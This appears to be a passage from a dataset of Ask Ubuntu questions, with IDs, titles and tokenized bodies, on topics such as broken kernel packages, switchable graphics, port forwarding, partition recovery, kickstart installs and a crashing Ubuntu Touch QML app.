3.2.0-67-generic /boot/vmlinuz-3.2.0-67-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-67-generic /boot/vmlinuz-3.2.0-67-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-67-generic_3.2.0-67.101_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i tried to remove the clean out old kernel files in /boot root @ ubuntu : apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-generic : depends : linux-image-3.2.0-67-generic but it is not installed e : unmet dependencies . try using -f. please provide some solution for this
513730	ubuntu 14.04 switchable graphics ati lenovo g510	sorry if my question sound stupid , but i 'm not very clever with linux yet i 'm facing well known problem around here namely switchablegraphics . in -- here -- you can find information that in linux kernel > = 3.12 switchablegraphics is managed by `` system '' and when i 'm executing cat /sys/kernel/debug/vgaswitcheroo/switch it returns 0 : dis : : dynoff 1 : igd : + : pwr so it means that power supplied to discretegpu ( ati 8570m ) was tuned off ( dynoff ) by `` system '' ( radeon driver ) automatically . ok so far . my question is ... is it possible to use `` automatic power managment '' and switch to ati gpu ? ? i tried already vgaswitcheroo echo off > /sys/kernel/debug/vgaswitcheroo/switch echo on > /sys/kernel/debug/vgaswitcheroo/switch echo dis > /sys/kernel/debug/vgaswitcheroo/switch but cat returns 0 : dis : : dynoff 1 : igd : + : pwr thanks in advance ! !
513731	forward ports from local network ips to external network	i have server running ubuntu server 12.04 . this server have two network carts . the first one is the industrial network . this network is visible only to the industrial devices connected to it and to the server . the second one is public network . the public network is visible to all the users . what i want to do is forward specific port from six devices connected to the industrial network to be visible on the public network . this is a simple example of my network : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- eth0 -- -- server -- -eth1 -- -- -- -- -- -- -- -- -- - indus | | | | | | | client trial d1 d2 d3 d4 d5 d6 c1 xxx . 192 192 192 192 192 192 192 010 010 xxx . 168 168 168 168 168 168 168 016 016 xxx . 111 111 111 111 111 111 111 056 056 xxx 051 052 053 054 055 056 010 010 158 so what i whant is to be able to access 192.168.111.051:502 from the client c1 machine over the server . what i came up with is port forwarding . something like the c1 connects to 10.16.56.10:503 and it is forwarded to the industrial network as 192.168.111.051:502 . is there a way i can achieve this using the command line interface ? is networking restart needed ?
513737	how to change bgcolor of active tab in chrome/chromium ?	this question complements the question how to change web browser 's tab bar background color or image ? it seems changing the whole tab bar bgcolor is not difficult , but how about changing the bgcolor of the active tab ? it 's especially necessary when you choose light monochrome icons for your dark theme , i.e . when those light icons are difficult to see in the active tab , toolbar , etc . of chrome/chromium , as seen in the screenshot below .
513740	`` can not open file system . file system seems damaged ``	i was using windows 7 till yesterday . i tried to install ubuntu 14 . 04 lts version yesterday with in windows 7 . but it was not succeeded . then i decided to install ubuntu only . by mistake i installed ubuntu in whole disk . after that to get deleted partitions i installed testdisk . i also used deeper search option . now i 'm getting `` file system damaged '' . it shows the hard disk ( 320gb /298 gib ) seems to small ! ( < 473 gb /441 gb ) check the harddisk size : hd jumpers setings , bios detection ... the following partitions ca n't be recovered : partition start end size in sectrors linux 19077 177 45 57604 81 13 618930716 linux 19080 192 57 57607 96 25 618930716 with ubcd also i used testdisk option . same result comes . `` can not open file system . file system seems damaged `` . i have all my stuff in hard disk . please help me to get recover my files in deleted partitions .
513746	ubuntu 12.04 to 14.04 lts upgraded but crashed soon after restarting the system	in ubuntu 12.04 the update manager offered me to upgrade it to 14.04 , so i kept it for upgrading for whole night and after all the downloading , fetching and removing of packages it asked for restart . so i restarted the system that 's it from that time there is no log in page , nothing is coming and just a black command prompt prompting initramfs is appearing ( busy box or something ) . how can i solve this issue ? or there is way to revert back to 12.04 ? please help ?
513747	why i am getting following error when trying to start sdk manager ?	i have a 64 bit- 20 gb ubuntu partition which has very less usable space . so i have put eclipse in my ubuntu and downloaded sdks to a folder in my another partition . so when i try to start sdk manager , i am getting the following error in my console : unexpected exception ' can not run program `` /media/data/android-sdks/platform-tools/adb '' : error=13 , permission denied ' while attempting to get adb version from '/media/data/android-sdks/platform-tools/adb' i have run chmod recursively on android-sdks directory . if i change the address for sdks to ubuntu partition , sdk manager starts successfully . is there anything i can do other than increasing the partition size ? i 'm running ubuntu 12.04 .
513748	adjust volume level of individual application	how can i adjust volume levels of individual applications ? everyone suggest using pulseaudio volume control , but it only allows to adjust volume of applications like video/music players , etc . how can i adjust settings of let 's say bittorrent client ? on windows 7/8 i can easily adjust volume levels on all running applications .
513751	enable permanent vertical and horizontal scroll bars	i am facing a problem and it is in ubuntu ( 14.04 ) permanent scroll bar is not there but it appears when you move the mouse pointer to right most side or bottom most side . but it is very difficult to use and lately it takes too much to appear and sometimes it does n't appear at all and so i have to close the application and reopen it . so i want to ask how to enable permanent scroll bars on right side and bottom most side . i am sure many people must have faced this problem before me . thanks . p.s : by permanent i mean scroll bars should be visible all the time .
513752	i want to increase the size of my boot partition ( ubuntu 14.04 version )	i read in another post that kernels are distributed as new releases rather than upgrades . i did n't know this when i was allocating space to my partitions during my initial install of ubuntu . as a result i ran out of space on my boot partition . can i increase the size of it using gparted and how do i do this without doing damage to my system ? 1 1049kb 512mb 511mb fat32 boot 2 512mb 768mb 256mb ext2 3 768mb 1000gb 999gb lvm model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu -- vg-swap_1 : 3712mb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 3712mb 3712mb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu -- vg-root : 996gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 996gb 996gb ext4 sorry , do n't know how to capture and post the terminal output screen .
513753	how to install spark in ubuntu 12.04 ?	it shows error like file size is too large , i am using through my institution internet connection its limited access . so i need help to how could install the spark ? ? ? my system is ubuntu 12.04 32-bit version . reply me even whatever mistake in my communication do n't mind that ...
513754	apt-get command problem	i am using ubuntu 12.04 32 bit in hp pavilion dv6 laptop ( amd processor ) after upgrade and reboot , the desktop does n't start and at cui ( ctrl + alt + f1 ) . when i try to login to my user and following error shows : apt-config : /lib/i386-linux-gnu/lib.so.6 : version 'glibc_2.17 ' not found ( required by /usr/lib/i386-linux-gnu/libstdc++.so.6 ) when i type sudo apt-get command same error shows up and apt-get command does n't work . all i have is character user interface .
513757	ubuntu 14.04/windows 8.1 dual boot fails after distribution upgrade - no grub menu !	i have been successfully using both ubuntu 14.04 and windows 8.1 on my toshiba satellite pro c50 since may 2014 . after performing a `` distribution upgrade '' via the update manager gui this morning the computer no longer displays the grub menu and boots straight to windows 8.1 how can i boot into ubuntu 14.04 without having to reinstall the os ? thanks chris edit : i have tried using boot-repair to fix the problem but can only find references to this when it is the installation of windows that has broken grub . in my case the computer has been dual-booting fine for 3 months but has failed since an upgrade of ubuntu !
513758	kickstart installation problem while booting the system	i want to install the ubuntu 12.04 desktop i have prepared the kick-start file and i kept at /var/www/ks.cfg # generated by kickstart configurator # platform=x86 # system language lang en_us # language modules to install langsupport en_in -- default=en_us # system keyboard keyboard us # system mouse mouse # system timezone timezone -- utc asia/kolkata # root password rootpw -- iscrypted $ 1 $ bmcn3ykw $ brf38rfefg8otau2mupyb0 # initial user user xxx -- fullname `` xxx '' -- iscrypted -- password $ 1 $ 7.qomu9i $ goak/yg9lfkvvlyoej56w . # reboot after installation reboot # use text mode install text # install os instead of upgrade install # use web installation url -- url ftp : //192.168.xx.xx/files/12.04 # system bootloader configuration bootloader -- location=mbr -- password=xxx # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # disk partitioning information part / -- fstype ext4 -- size 50000 part swap -- size 4000 part /boot -- fstype ext4 -- size 200 # network information network -- bootproto=dhcp -- device=eth0 # firewall configuration firewall -- disabled -- ssh # x window system configuration information xconfig -- depth=8 -- resolution=640x480 -- defaultdesktop=gnome -- startxonboot % post # an updated sources.list with a closer mirror . echo copying apt sources cp /mnt/cdrom/geeks-org-sources.list /etc/apt/sources.list # update the system . echo updating apt-get update apt-get -y dist-upgrade # clean up some stuff rm -f /etc/ssh/ssh_host_* rm -f /var/cache/apt/archives/*.deb rm -f /var/cache/apt/*cache.bin rm -f /var/lib/apt/lists/*_packages # blocking the usb echo `` blacklist usb-storage '' > > /etc/modprobe.d/blacklist.conf # and finally , reboot the system ( sync for good luck ; ) ) echo rebooting sync reboot i kept the ks.cfg file in /var/www/ so now it is in network i took another system and boot with usb in that usb ubuntu os is present . i enter into ubuntu installation screen . the problem is that were to enter the http : //192.168.x.x/ks.cfg file can any one help please
513761	change clock resolution to 1000 hz	i am running ubuntu 12.04 and i need to change the clock resolution to 1000 hz ( now it 's 250 hz , the default value ) . i understand that i have to set it and then recompile the kernel , as for example described here . it 's not clear , though , how i can do it from the terminal , as for instance the suggested make menuconfig wo n't work . any tips ? my current settings are : $ cat /boot/config-3.8.0-29-generic | grep hz config_no_hz=y config_rcu_fast_no_hz=y # config_hz_100 is not set config_hz_250=y # config_hz_300 is not set # config_hz_1000 is not set config_hz=250 config_machz_wdt=m
513762	hardware compatibility on h97 chipset/hardware support	i am aware that there is documentation about compatibility but it is way out dated . i am also aware that there is a hardware compatibility page on ubuntu website , but that one is focused on the whole box rather than a single piece of hardware . i have some experience with linux os , and some experience playing ubuntu server in a virtual machine , but never worked on a machine that lives in the real internet . i am building a home server with an intel h97 chipset motherboard . i have looked at several models and none of them has linux in the supported os category . i have the experience of installing ubuntu desktop 14.04 on my 4-years-old lap top , and except for some system errors on start up , there is not too much i can complain about , so i guess i should be fine . however , this time i am going to install ubuntu server 14.04 on a relatively new piece of hardware ( i went to http : //linux-drivers.org/ but found nothing really helpful ) . for example the asus motherboard has m.2 socket and intel lan i218v chip , the gigabyte motherboard has two lan chips ( intel lan wgi217v and atheros ar8161-bl3a-r ) . so i really want to make sure everything will work . usually i would just trust ubuntu and buy all hardware i need , but basing on my past experience with the ubuntu desktop version on my lap top , i am not so convinced . there is an easily noticeable difference : when the system is idle , the fan runs much more frequently and longer under ubuntu . this leads to my suspicion that generally hardware will have worse support for ubuntu , which is no surprising at all but enough for me to put this post here . and as far as i know , some intel cpu features come with software that usually will not run under linux . any help , idea or thoughts would be greatly appreciated !
513763	ca n't listen input device ( external soundcard )	i have an xbox 360 plugged to my laptop through an external usb sound card . i can see the sound card in my input devices and even the sound meter moves indicating sound activity , but i ca n't hear anything even with the `` fallback '' option ticked ( see screenshot ) . i 'm running xubuntu 14.04 . any ideas how to fix this ? thanks
513764	change default workspace in octave	i freshly installed octave on my computer and was wondering if i could switch the default workspace from /home/user to , let 's say , /home/user/octave but could not find any advice online ... i am using ubuntu 14.04 if that 's of any importance . any help would be greatly appreciated
513765	nvidia dual monitor resolution problem	i have just installed ubuntu 14.04 . i have two monitors and the monitor on the left has a different resolution and i ca n't change it . ( see : screen shot ) output of xrandr : screen 0 : minimum 8 x 8 , current 2560 x 1080 , maximum 16384 x 16384 dvi-i-0 connected primary 640x480+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 640x480 59.9*+ 320x240 60.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 connected 1920x1080+640+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1680x1050 60.0 1440x900 75.0 59.9 1280x1024 75.0 60.0 1280x720 60.0 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 72.8 59.9 dp-1 disconnected ( normal left inverted right x axis y axis ) thanks in advance .
513766	mac host and ubuntu guest on virtual box shared folder issue	i have set up ubuntu server on virtual box on my mac . i created a shared folder which appears to be saved and visible in the configuration section on virtual box for the ubuntu server machine . my only issue is i do n't know where this is or how to access it from inside ubuntu server . does it get it 's own directory or do i have to create some sort of a sym-link ? if i do need to manually tell it to look in the mac for the file how do i reference the mac machine ?
513777	dodgy install/uninstall puppet	getting started with puppet and also not much chop on ubuntu . seems i 've made a mess of installing/uninstalling puppet on tahr . my hunch so far is that i 've deleted it incorrectly and now my re-install is not working how i think it should ... . can anyone give a few tips to find what i 'm missing ? trying to run puppet phil @ phil-hp-xw8600-workstation : ~ $ puppet the program 'puppet ' is currently not installed . you can install it by typing : sudo apt-get install puppet-common i 've gone through and installed it though - phil @ phil-hp-xw8600-workstation : ~ $ sudo apt-get install puppet-common [ sudo ] password for phil : reading package lists ... done building dependency tree reading state information ... done puppet-common is already the newest version . 0 to upgrade , 0 to newly install , 0 to remove and 40 not to upgrade . whereis i tried to uninstall puppet manually by deleting what i could see of it files . thing is originally it used to show up a bunch of places but now it is only there in a few spots : before whereis puppet /etc/puppet /usr/bin/puppet /usr/local/bin/puppet /usr/share/puppet /usr/share/man/man8/puppet.8.gz /usr/bin/x11/puppet after phil @ phil-hp-xw8600-workstation : ~ $ whereis puppet puppet : /usr/share/man/man8/puppet.8.gz also done : apt-get -- purge remove puppet [ purged ] the install , re-did the install ( see above ) installed via software center trying to purge the install after all this : phil @ phil-hp-xw8600-workstation : ~ $ sudo apt-get -- purge remove puppet [ sudo ] password for phil : reading package lists ... done building dependency tree reading state information ... done package 'puppet ' is not installed , so not removed 0 to upgrade , 0 to newly install , 0 to remove and 40 not to upgrade .
513780	why a service in init.d and not in rc*.d started ?	i have a configured and working service script myservice in the /etc/init.d and in /etc/rc*.d directories of an ubuntu 13.10 distribution . removing the links in /etc/rc*.d using update-rc.d -f myservice remove doesnt'remove the service after a reboot . what am i missing here and how should i properly add/remove services on this ubuntu distribution ?
513784	trying to add oracle solaris ( sunos ) os 11.2 as a dual boot under grub2	i was trying to install oracle solaris ( sunos ) 11.2 as a dual boot under grub2 . i followed the grub2 instructions for adding an iso and i get the following grub entry for the solaris iso -- menuentry `` grml rescue system ( sol-11_2-text-x86.iso ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 fa099154-932d-47e2-a529-bf050aa7d62e else search -- no-floppy -- fs-uuid -- set=root fa099154-932d-47e2-a529-bf050aa7d62e fi iso_path= '' /boot/grml/sol-11_2-text-x86.iso '' export iso_path kernelopts= '' `` export kernelopts loopback loop `` /boot/grml/sol-11_2-text-x86.iso '' set root= ( loop ) configfile /boot/grub/loopback.cfg } but when i try booting up this grub entry does `` nothing '' -- this grub is shown in the grub boot-up menu ... but when i select it -- it just spins back to the grub menu with nothing done to the iso image ... . please any one who has managed to install the solaris iso point me to how to get about it ... .
513785	pros and cons of cinelerra vs adobe premiere pro	what are the pros and cons of cinelerra over adobe premiere pro cs 6 ? and could you provide a link of the source ?
513786	intranet lan networking for office pcs	i am a newbie in ubuntu . i have 8 new pcs installed with ubuntu 14.04 , i am unable to do networking in them . i want to share files in all pc 's ubuntu to ubuntu which includes sharing a drive and folder both which will be then accessed by all members in our lan network when pc 's are on . i went for samba , followed all instructions made user , shared folder , changed the config file . did everything but still none of the pc 's are showing in network . i also tried with ubuntu to windows sharing tutorials but did n't get any success ... more over ip messenger is also not working in 14.04 lts please help ...
513787	can cpulimit run a continuous background check ?	i am suffering from occasional desktop freezes and am still investigating the cause . ( links forthcoming . ) in the meantime i came across the following suggestion to cpulimit the unity-panel-service , which is working great so far ! sudo cpulimit -eb unity-panel-service -l 30 i would now like to configure cpulimit so that it : starts as soon as i log in runs in the background ( no terminal required ) if unity-panel-service restarts , it should discover and limit the new process is this possible ? note : i am aware that this is a workaround to a desktop bug . my question is primarily about using cpulimit , rather than the bug/workaround . when i have a moment i will provide links relating to the bug itself so discussion on that front can happen elsewhere .
513788	problem with network manager ( wireless related )	i am having problem with my wireless network for some period of time the network work fines but after some time it stop working ... trying to disconnect shows error device disconnect failed ( 4 ) did not receive a reply.possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken all the commands related to network manager just hangs such as iwconfig , sudo service network-manager restart ... .some help will be appreciated i am using ubuntu 14.04
513789	create bootable usb of ubuntu on mac for a failed partial ubuntu install	so i have 3 computers at my disposal , and would like to wipe my failed partial ubuntu update on comp1 ( which is also locked out from incorrect logins ) ( originally 12.04 , failed partial of 14.04 ) and do a fresh install of ubuntu 14.04 . i am currently on a mac ( mac1 ) , and have tried making a bootable usb ubuntu 14.04 installation . i followed the `` how to on a mac '' , creating an img file from the iso . after copying the img onto the usb , the usb had no success on comp1 ( goes straight to the partially working ubuntu , even when pressing f12 for boot ( which is ignored ) . i mounted the iso onto comp1 and copied over all files onto pendrie ; with no success ( can not copy over symbolic links ) comp2 has ubuntu 12.04 installed via cd ( with a failed windows 7 install on another partition . eventual aim is to use ubuntu os to claim a new windows 7 installation for comp2 ) i feel there are my different routes to try , but do not know how to go about this . how can i create a working bootable usb ubuntu 14.04 installation ( preferably from mac1 but not the end of the world if i ca n't ) for comp1 ? extra info : comp1 tty1 quotes 14.04 install , but am locked out as stated above ( sudo is not possible due to locked out ) am attempting this on admin account .
513791	regarding boot repair	i 've repaired grub using boot repair disk x64 . i 've windows 7 and ubuntu 14.04 on laptop both are working properly . i want to reinstall windows copy but it fails to boot from dvd and win 7 iso through usb . i 've set the booting priority properly but it always goes to grub . so how can i install new windows ?
513794	thinkpad x1 carbon - volume buttons no longer working	i 've upgraded to 14.04 lts , and now my volume up and down keys no longer work . the mute button still works , bizarrely . the media buttons ( prev track , play/pause and next track ) have also stopped working . i have a previous generation lenovo thinkpad x1 carbon i.e . the one without the 'soft function keys ' , so this is not a softkey issue . worked previously with ubuntu 13.10 . i am using an up to date install . uname output : linux 3.13.0-34-generic x86_64 gnu/linux i 've checked the system settings- > keyboard- > shortcuts- > sound and media and they register the up and down volume keys just fine . if i change the keys to be ( say ) ctrl- and ctrl+ , then i can alter the volume , but when i change them back to 'audio lower volume ' and 'audio raise volume ' by using the keys , they no longer change the colume or activate the top-right corner 'control flash ' the same way that mute or brightness controls do . i 'm at a loss . there 's obviously nothing wrong with the keys , but somewhere in the os the keypresses are being diverted or dropped and they do n't make it through to applications as events ...
513796	should i do a regular system update before a upgrading to the next distro ?	should i perform distribution upgrade only on a fully up to date system , or should it run fine if i do the distribution upgrade right away ? more details : before i perform an upgrade to the next version . i perform it first in a virtual machine to see it will be fine , and wo n't mess up anything . when i booted my virtual machine it immediately popped up a window whether i want to upgrade it to 14.04 . i clicked yes . it initially went fine then started to spew error popups about dependency problems . the vm have n't booted up since the last upgrade to 12.04 , 2 years . i suspect this caused the problem but not sure . i worry i 'd mess up the host if i get the same errors during upgrade .
513797	how to avoid the automatic disk check every 30 reboots ?	it it has to do a disc check from being powered down 30 times like that.i have to do it that way cause it wont power down regularly and i 'm running linux ultimate edition x64 2.3 . i know its out dated but i can upgrade . please help ! i 've tried everything and i 'm completely clueless .
513803	any support in any ubuntu flavor for per-display dpi scaling ?	my question is about having multiple monitors with different density ( dpi ) to display the ui at approximately the same physical dimensions . the feature is supported by windows 8.1 and mac os 10.9 . for an illustration of it please see this m $ blog ( the calculator example ) : optimizing multi-mon dpi scaling in windows 8.1 i use kde ( kubuntu 14.04 ) . my displays are : 15.4in fullhd laptop ( 144dpi ) 23in fullhd laptop ( 96dp ) everything looks too small on the laptop and too large on display . it 's so funny because i use the laptop on the couch when i need to casually browse ( need larger scale to see things easier ) and i use the desk monitor when i need to work ( need smaller scale to fit more stuff ) . while this is not a problem on windows and mac ( because of per-display scaling ) : mac scaling looks good on the retina display , but rather poor on the large monitor ( blurry ) . it 's still usable . the feature ca n't be turned off . windows scaling looks horrible : the display you used to login looks better - the other one very blurry . also some important apps such as chrome v36 are most of the time blurry ( poorly scaled ) . turning off per-display scaling solves the blurriness . linux - there is no support in any window/desktop manager that i know of . any thoughts ? cheers !
513804	completely unable to install python2.7-dev	am totally stuck ! am unable completely to install python2.7-dev on my ubuntu13.04 . i have tried all the tricks mentioned on this site ( askubuntu.com ) and many other sites on the web but still nothing ! am running ubuntu 13.04 64bit on a virtualbox , but every time i run sudo apt-get install python2.7-dev , i get the following error ; python2.7-dev : depends : python2.7 ( = 2.7.3-0ubuntu3.5 ) but 2.7.4-2ubuntu3 is to be installed depends : libpython2.7 ( = 2.7.3-0ubuntu3.5 ) but 2.7.4-2ubuntu3 is to be installed depends : libexpat1-dev but it is not going to be installed depends : libssl-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried to do apt-get update , but still nothing ! i 've even tried installing python2.7 from sources , but still nothing doing ! is there a single package with all the dependencies i can download , that can just install everything ( python2.7-dev ) or is there another trick i can use to get the python-dev headers installed on my machine . hint : i 've noticed when i run sudo apt-get update , somewhere along the updates i 've seen some errors ; ... get:1 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] ign http : //us.archive.ubuntu.com raring release ign http : //us.archive.ubuntu.com raring-updates release ign http : //us.archive.ubuntu.com raring-backports release ign http : //us.archive.ubuntu.com raring-security release get:2 http : //us.archive.ubuntu.com precise-updates release [ 98.7 kb ] err http : //extras.ubuntu.com raring/main sources 404 not found err http : //extras.ubuntu.com raring/main amd64 packages 404 not found err http : //extras.ubuntu.com raring/main i386 packages 404 not found ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en ... on my precise-updates.list file is a single entry ; deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted i do n't know if that might help help ! paul
513806	unity freezes from time to time ( ubuntu 14.04 )	fresh install of unity , it freezes approximately every 2 minutes for 10 seconds or so . when it freezes i am only able to move the cursor and switch between shell and gui ( ctrl-alt-f2 ) . video configuration : intel integrated video card ( dell latitude e4310 ) how to find out what causes the freezes ? how to fix this ?
513811	ubuntu on dell latitude e6540	so , i guess my question can be broken into two parts ... my work laptop is a dell latitude as above currently running windows 7 ( i personally use a dual boot macbook with ubuntu/mac ) anyway i finally cracked the shits with it today and asked our it guy if i can put ubuntu on it instead which he had no issues with . i would like to create an image of my current windows setup for use in virtualbox on the laptop once i have ubuntu on , i have never done this with windows . can anyone shed some light on the best way to do this ? from my understanding i need to use windows to create a system restore disk then create a system backup , from this i should be able to reinstall windows in its current state . is there a dell image for 14.04 available , i have had a look and can only find a 12.04lts compatible image for dell laptops ? anyhelp would be great and most appreciated !
513812	why ca n't i install a vm within a vm ?	i read it is possible to install vms inside vms as deeply as we want . however , in my case , i tried ubuntu 12.04 , ubuntu 12.10 , ubuntu 13.04 , ubuntu 13.10 , ubuntu 14.04 , ubuntu 14.10 vms in which i installed virtualbox ( s ) and each time i try to install a vm using virtualbox i get all the time a black screen . this picture shows what i get :
513813	grads : symbol look up error	i am using grads in ubuntu 14.04 but it fails to produce graphics of .ctl file from wrf output . error is 'grads : symbol lookup error : grads : undefined symbol : nc_get_chunk_cache' but it works correctly in other grads using the same ubuntu version .
513814	why ca n't i type my password after using a sudo command ?	i am running ubuntu 14.04 lts . when i go to use a sudo command , it asks for my password . when i go to type my password , it does n't let me type a password . if anyone could possibly help , i would really appreciate it
513819	all open programs/windows disappear after attempting to minimize to taskbar lubuntu 14.04	anytime i attempt to minimize any programs and/or windows , such as google , libre office , pcmanfm , etc . the open window/program completely disappears . it used to appear in the taskbar but now there is nothing . also , now when i open any program it also no longer appears in the taskbar . the program also no longer appears in the task manager after attempting to minimize . i am utilizing lubuntu 14.04 . this just started to happen within the past week . please assist if possible . thank you .
513823	how to set a static ip on ubuntu 14.04 which is runing on wmware workstation 10 .	i configured master and slave setup . but some times after restart the machines wired ip address changes . how to set a static ip step by step . please help me thank you .
513825	running lmgrd on ubuntu 14.04 lts	i have installed xilinx 14.7 in ubuntu 14.04 lts machine ( i386 - 64bit ) . but i am unable to run lmgrd ( for starting the license server ) . when i googled this problem , i found that lsb-core package needs to be installed . but the package is having many dependencies , i want to know how to install lsb-core package with all the necessary dependencies . thanks for the help on running sudo apt-get install lsb-core i got the following output : package lsb-core is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lsb-core ' has no installation candidate so i downloaded lsb-core package from http : //packages.ubuntu.com/trusty/misc/lsb-core site and used sudo dpkg -i ./lsb-core_4.1+debian11ubuntu6_i386.deb to install it by doing it , i got the following output selecting previously unselected package lsb-core . ( reading database ... 163205 files and directories currently installed . ) preparing to unpack ... /lsb-core_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-core ( 4.1+debian11ubuntu6 ) ... dpkg : dependency problems prevent configuration of lsb-core : lsb-core depends on libc6 ( > > 2.3.5 ) . lsb-core depends on libz1 . lsb-core depends on libncurses5 . lsb-core depends on libpam0g . lsb-core depends on lsb-invalid-mta ( > = 4.1+debian11ubuntu6 ) | mail-transport-agent . lsb-core depends on at . lsb-core depends on binutils . lsb-core depends on cron | cron-daemon . lsb-core depends on libc6-dev | libc-dev . lsb-core depends on locales . lsb-core depends on m4 . lsb-core depends on mailx | mailutils . lsb-core depends on ncurses-term . lsb-core depends on pax . lsb-core depends on psmisc . lsb-core depends on alien ( > = 8.36 ) . lsb-core depends on python3 . lsb-core depends on lsb-security ( > = 4.1+debian11ubuntu6 ) . lsb-core depends on time . dpkg : error processing package lsb-core ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : lsb-core i am unable to install gdebi . on running `sudo apt-get install gdebi` i got the following output : package gdebi is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gdebi ' has no installation candidate i want to know how to install `lsb-core` package with all the necessary dependencies in one go .
513826	is there a way to back up a whole hard disk ( which holds the os ) and use it for a reinstall ?	i 've built my own system and the ssd i 'm using has failed twice already . it 's always been during boot up and it just says operating system missing . i 've checked and made sure that it was definitely booting to the correct hard disk ( the build has three in total , a ssd for the os , and two hdds for documents , music and photos ) . i 'm only losing the os on each failure so it 's not too serious , just annoying with all the tweaks that i need to do to get it back to where it was . i was wondering if there was a way to make a copy of the entire ssd which holds the operating system and then if it fails again copy it across to the drive ( which would needs= to be done without an os present ? ) i 'll give most solutions a go but i would place myself as a keen amateur . cheers in advance
513827	strange video artifact with plymouth when turning off pc	i have a tremendously tedious issue with plymouth : when i turn off my pc and appears plymouth , it produces some strange video artifacts ( i 'll post some picture very soon ) . i 've just reinstalled ubuntu because i deleted windows in dual boot . i 've never encountered this problem ( and i 've reinstalled ubuntu many times on my laptop ) . how to solve it ? my conf . is : acer aspire e1-522 with amd apu a6 5200 with fglrx updates ( and no , reinstalling the drivers or switching to the open source does n't fixes the problem ) .
513829	sensors missing	i recently switched from debian wheezy ( 7.6 ) to ubuntu 14.04.1 . in debian , xfce4-sensors-plugin recognized the mainboard sensors chip , fschmd ( i 'm not sure if lm-sensors did ) . now in ubuntu does n't but when run sensors-detect tells something about fschmd . this is the end of the dialog : driver `fschmd ' : * bus `smbus i801 adapter at 18e0' busdriver `i2c_i801 ' , i2c address 0x73 chip `fschds ' ( confidence : 6 ) driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp fschmd # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) yes successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service kmod start' to load them . unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok does anyone know how to detect fschmd chip ? p.s . : i 'm a noob on linux and sorry for my bad english
513831	how to get mac theme working ?	i am working on macbuntu 14.04 ( mavericks theme ) so far i have succeeded in theme and adding every functionality but the problem it that i want a mac like top panel in ubuntu so that the whole theme is complete this is the only problem with it . help me
513833	why my application crash on ubuntu-touch ?	i want to try to create un application for ubuntu-touch with qml ! i was created a simple application : import qtquick 2.0 import qtquick.controls 1.1 import ubuntu.components 0.1 import `` components '' /* ! \brief mainview with a label and button elements . */ import qtquick.localstorage 2.0 import qtquick.layouts 1.1 mainview { // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer.z-admin-angels-gmail-com.oweme '' /* this property enables the application to change orientation when the device is rotated . the default is false . */ automaticorientation : true width : units.gu ( 100 ) height : units.gu ( 75 ) page { title : i18n.tr ( `` oweme '' ) column { anchors.rightmargin : 8 anchors.bottommargin : 8 anchors.leftmargin : 24 anchors.topmargin : 24 spacing : units.gu ( 1 ) anchors { margins : units.gu ( 2 ) fill : parent } row { id : gridbutton x : 218 y : 30 width : 541 height : 65 button { objectname : `` adddebpt '' text : i18n.tr ( `` add debpt '' ) color : ubuntucolors.midaubergine onclicked : { var component = qt.createcomponent ( `` qml/myqmlfile.qml '' ) ; if ( component.status == component.ready ) component.createobject ( label1 , { `` x '' : 100 , `` y '' : 100 } ) ; } } /*button { width : 153 objectname : `` addcommunbuy '' text : i18n.tr ( `` add commun buy '' ) color : ubuntucolors.lightaubergine onclicked : { } } */ button { width : 153 objectname : `` removedebpt '' text : i18n.tr ( `` remove debpt '' ) color : ubuntucolors.lightaubergine onclicked : { } } } // buttongrid } gridlayout { id : gridform x : 42 y : 92 width : 622 height : 340 label { id : label1 x : 227 y : 218 width : 272 height : 89 text : qstr ( `` open qml here '' ) font.pointsize : 21 horizontalalignment : text.alignhcenter wrapmode : text.wrapanywhere } } } // grid content } when i lunch my application trought ubuntu i386 emulator , the application crash ... or when i run it with desktop i have no problem application output : executing : /tmp/com.ubuntu.developer.username.oweme_0.1_all.click launcher pid : 4502 appid : com.ubuntu.developer.username.oweme_oweme_0.1 architecture : all transaction : installing files status : waiting in queue status : 